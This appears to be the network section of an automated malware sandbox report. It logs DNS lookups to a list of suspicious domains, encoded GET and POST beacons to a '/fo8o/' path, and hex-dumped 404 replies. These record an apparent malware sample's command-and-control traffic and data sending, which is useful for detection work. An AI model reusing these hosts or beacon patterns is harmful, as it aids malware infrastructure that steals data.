Source: global traffic	HTTP traffic detected: GET /fo8o/?tjVTF=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMMnVmQq+lm2z9nd9BQOLzJZJregrcunvpsiXNjQ3cRjwhNT6H4Su73WUG&2na=ihrTFVnP9VKx HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,enHost: www.elettrosistemista.zipConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic	HTTP traffic detected: GET /fo8o/?tjVTF=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKYVFf0Y/CRrIidra9fUChJErWJpFnwi4qHc/7DUMj+ceuAXwSmcXIkD1z&2na=ihrTFVnP9VKx HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,enHost: www.empowermedeco.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)

Source: global traffic	DNS traffic detected: DNS query: www.3xfootball.com
Source: global traffic	DNS traffic detected: DNS query: www.kasegitai.tokyo
Source: global traffic	DNS traffic detected: DNS query: www.goldenjade-travel.com
Source: global traffic	DNS traffic detected: DNS query: www.antonio-vivaldi.mobi
Source: global traffic	DNS traffic detected: DNS query: www.magmadokum.com
Source: global traffic	DNS traffic detected: DNS query: www.rssnewscast.com
Source: global traffic	DNS traffic detected: DNS query: www.liangyuen528.com
Source: global traffic	DNS traffic detected: DNS query: www.techchains.info
Source: global traffic	DNS traffic detected: DNS query: www.elettrosistemista.zip
Source: global traffic	DNS traffic detected: DNS query: www.donnavariedades.com
Source: global traffic	DNS traffic detected: DNS query: www.660danm.top
Source: global traffic	DNS traffic detected: DNS query: www.empowermedeco.com
Source: global traffic	DNS traffic detected: DNS query: www.joyesi.xyz
Source: global traffic	DNS traffic detected: DNS query: www.k9vyp11no3.cfd

Source: unknown

HTTP traffic detected: POST /fo8o/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enAccept-Encoding: gzip, deflate, brHost: www.goldenjade-travel.comOrigin: http://www.goldenjade-travel.comCache-Control: no-cacheConnection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 218Referer: http://www.goldenjade-travel.com/fo8o/User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)Data Raw: 74 6a 56 54 46 3d 47 48 69 4b 78 65 34 51 36 56 68 4b 4b 65 73 4d 4c 77 6e 74 6b 63 45 31 2b 61 49 63 6f 52 36 64 71 4d 45 4c 35 73 65 2f 4a 2f 34 67 4d 70 64 73 71 50 73 32 2f 73 43 39 6a 37 30 39 63 4b 2f 45 2f 7a 69 79 36 4e 4a 44 48 74 37 63 4b 6f 54 4e 62 4e 2f 53 68 78 59 46 6f 58 49 44 71 59 6f 55 62 37 2b 37 47 5a 56 62 57 32 55 47 43 63 58 30 4a 68 4c 59 6e 5a 50 58 32 76 76 30 79 6f 5a 4c 72 4e 6b 43 44 61 4f 77 5a 50 65 6f 6b 33 6c 4c 70 2b 36 45 49 54 62 77 66 66 66 57 47 32 62 66 4f 4e 57 2b 6c 36 56 44 69 55 6a 66 53 54 6e 4d 45 48 39 5a 54 68 7a 67 4d 46 49 64 59 4a 36 43 4f 55 34 77 31 69 59 36 39 45 41 43 78 71 63 36 6e 51 3d 3d Data Ascii: tjVTF=GHiKxe4Q6VhKKesMLwntkcE1+aIcoR6dqMEL5se/J/4gMpdsqPs2/sC9j709cK/E/ziy6NJDHt7cKoTNbN/ShxYFoXIDqYoUb7+7GZVbW2UGCcX0JhLYnZPX2vv0yoZLrNkCDaOwZPeok3lLp+6EITbwfffWG2bfONW+l6VDiUjfSTnMEH9ZThzgMFIdYJ6COU4w1iY69EACxqc6nQ==

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 09 Jan 2025 08:41:41 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Thu, 09 Jan 2025 08:42:05 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Thu, 09 Jan 2025 08:42:08 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Thu, 09 Jan 2025 08:42:10 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Thu, 09 Jan 2025 08:42:13 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jan 2025 08:44:02 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jan 2025 08:44:05 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jan 2025 08:44:07 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jan 2025 08:44:10 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jan 2025 08:44:16 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>
